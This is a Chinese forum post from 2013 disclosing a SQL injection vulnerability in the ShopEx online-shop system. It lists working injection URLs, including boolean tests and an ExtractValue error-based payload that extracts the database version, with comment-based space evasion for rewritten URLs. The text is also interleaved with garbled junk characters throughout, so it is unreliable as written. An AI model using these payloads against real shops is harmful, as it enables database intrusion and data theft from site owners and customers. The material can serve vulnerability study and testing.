注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术… `3 S$ A/ T7 L
; `7 J# G- L3 G' y5 g- C- D好吧,我扯远了~~
2 `) ?. A) W( |. V& v# W. O6 E其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~
% m! A4 A' s! z8 U* N不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下: ; B, f& C5 X# c y
2 c3 g/ X, \2 O# m9 ?- i7 U: Chttp://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
6 x; @8 T' e2 [( a ~! d' D1 t+ E# \; _: d1 J3 |& w$ S0 \
http://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html 1 ]+ V. c1 g& x* \$ D9 }: l- G6 v
6 M8 R( {2 ~: p" p+ x$ e1 Whttp://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
3 ]% U* u8 {3 f" u+ t& U4 A' o, _$ T! n5 D* I8 Y
http://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html 5 ?4 j/ p& H- _% A1 k
5 z; L9 u+ ?" v; ~
- E, ?- [- w. I一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。: Q5 F1 M5 D9 }* C" s2 O! L; D
如何注入就不多说了,10多年的东西了…不会也会了…
; T) }7 J+ n: o3 K X$ G2 w+ g) l. _$ m: c: C
1 F. j6 a0 c) J4 R& K
* X/ p2 y: ^; \, v0 T3 d8 u
2 C4 s6 p1 N# ?0 x+ H1 R; c |
发表于 2013-2-19 08:31:27
收藏
支持
反对